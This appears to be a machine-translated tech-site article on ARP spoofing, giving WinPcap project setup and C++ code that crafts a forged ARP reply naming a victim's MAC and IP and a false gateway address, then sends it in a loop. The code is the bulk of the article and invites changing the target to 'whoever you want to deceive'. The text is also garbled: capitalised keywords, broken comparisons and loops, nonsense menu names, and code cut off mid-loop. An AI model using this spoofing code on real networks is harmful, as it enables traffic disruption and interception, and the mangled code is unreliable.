Shulou(Shulou.com)06/01 Report--

Because the network circulation of the local area network is not carried out according to the IP address, but according to the MAC address. Therefore, the MAC address is forged as a non-existent MAC address on A, which will lead to network failure, and A cannot Ping C! This is a simple ARP deception.

There is an ARP cache table in every computer with TCP/IP protocol installed. The IP address in the table corresponds to the MAC address one by one. At the command prompt, type "arp-a" to view the contents of the ARP cache table.

Note: the contents of the ARP table can be deleted with the "arp-d" command, and the correspondence between the IP address and the MAC address can be manually specified in the ARP table with "arp-s".

The configuration and code are as follows:

Project-- > * * attribute (alt+F7)

Configure properties-- > Cramp Candle colors-- > General-- > attach include directory-- > (add the file path (Include) where the header file is located to the attached directory C:\ WpdPack\ Include)

Project-- > * * attribute (alt+F7)

Configure properties-- > linker-- > General-- > additional library directory-- > (add the directory where Packet.lib;wpcap.lib is located (Lib) to the additional library directory C:\ WpdPack\ Lib)

Project-- > * * attribute (alt+F7)

Configure properties-- > linker-- > input-- > attach dependencies-- > supplement "; Packet.lib;wpcap.lib"

Project-- > * * attribute (alt+F7)

Configuration properties-- > Candlestick colors-- > preprocessor-- > preprocessor definition-- > supplement "; HAVE_REMOTE"

/ / WinpCap Test.cpp: defines the entry point for the console application.

/ /

# include "stdafx.h"

# include

Int _ tmain (int argc, _ TCHAR* argv [])

{

Pcap_if_t * allAdapters;// Adapter list

Pcap_if_t * adapter

Pcap_t * adapterHandle;// adapter handle

U_char packet [1020]; / / data packets to be sent

Char errorBuffer [PCAP_ERRBUF_SIZE]; / / error message buffer

If (pcap_findalldevs_ex (PCAP_SRC_IF_STRING, NULL, & allAdapters, errorBuffer) =-1)

{/ / retrieve all network adapters connected to the machine

Fprintf (stderr, "Error in pcap_findalldevs_ex function:% s\ n", errorBuffer)

Return-1

}

If (allAdapters = = NULL)

{/ / No adapters exist

Printf ("\ nNo adapters found! Make sure WinPcap is installed.\ n")

Return 0

}

Int crtAdapter = 0

For (adapter = allAdapters; adapter! = NULL; adapter = adapter- > next)

{/ / traverse input adapter information (name and description information)

Printf ("\ n%d.%s", + + crtAdapter, adapter- > name)

Printf ("-% s\ n", adapter- > description)

}

Printf ("\ n")

/ / Select an adapter

Int adapterNumber

Printf ("Enter the adapter number between 1 and% d:", crtAdapter)

Scanf_s ("d", & adapterNumber)

If (adapterNumber

CrtAdapter)

{

Printf ("\ nAdapter number out of range.\ n")

Pcap_freealldevs (allAdapters); / / release the adapter list

Return-1

}

Adapter = allAdapters

For (crtAdapter = 0; crtAdapter)

Next

/ / Open the specified adapter

AdapterHandle = pcap_open (adapter- > name, / / name of the adapter

65536, / / portion of the packet to capture

/ / 65536 guarantees that the whole

/ / packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, / / promiscuous mode

1000, / / read timeout-1 millisecond

NULL, / / authentication on the remote machine

ErrorBuffer / / error buffer

);

If (adapterHandle = = NULL)

{/ / specified adapter failed to open

Fprintf (stderr, "\ nUnable to open the adapter\ n", adapter- > name)

/ / release adapter list

Pcap_freealldevs (allAdapters)

Return-1

}

Pcap_freealldevs (allAdapters); / / release the adapter list

/ / create a data packet

Packet [0] = 0xc8; packet [1] = 0x9c; packet [2] = 0xdc; packet [3] = 0x22; packet [4] = 0x6c; packet [5] = 0x58; / / mac address of the deceived computer

Packet [6] = 0xc8; packet [7] = 0x9c; packet [8] = 0xdc; packet [9] = 0x22; packet [10] = 0x62; packet [11] = 0x0f; / / your own mac address

Packet [12] = 0x08; packet [13] = 0x06; / / Ethernet encapsulated arp protocol (do not move)

Packet [14] = 0x00; packet [15] = 0x01; / / arp Field 1: represents Ethernet

Packet [16] = 0x08; packet [17] = 0x00; / / arp Field 2: represents IP protocol

Packet [18] = 0x06; / / arp Field 3: represents the length of the layer 2 address

Packet [19] = 0x04; / / arp Field 4: represents the length of the layer 3 address

Packet [20] = 0x00; packet [21] = 0x02; / / arp Field 5: this is an arp reply message; the following is the 6th, 7th, 8th and 9th fields of arp

Packet [22] = 0xc8; packet [23] = 0x9c; packet [24] = 0xdc; packet [25] = 0x22; packet [26] = 0x62; packet [27] = 0x06; / / false gateway address

Packet [28] = 0xac; packet [29] = 0x1c; packet [30] = 0x0f; packet [31] = 0xfe; / / ip of the gateway, here is 172.28.15.254 (not needed in our lab)

Packet [32] = 0xc8; packet [33] = 0x9c; packet [34] = 0xdc; packet [35] = 0x22; packet [36] = 0x6c; packet [37] = 0x58; / / mac address of the deceived computer

Packet [38] = 0xac; packet [39] = 0x1c; packet [40] = 0x0f; packet [41] = 0x13; / / the IP address of the deceived computer. This is 172.28.15.19 (change it to the IP of whoever you want to deceive)

/ / send data packets

For (int ssde=0;ssde

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.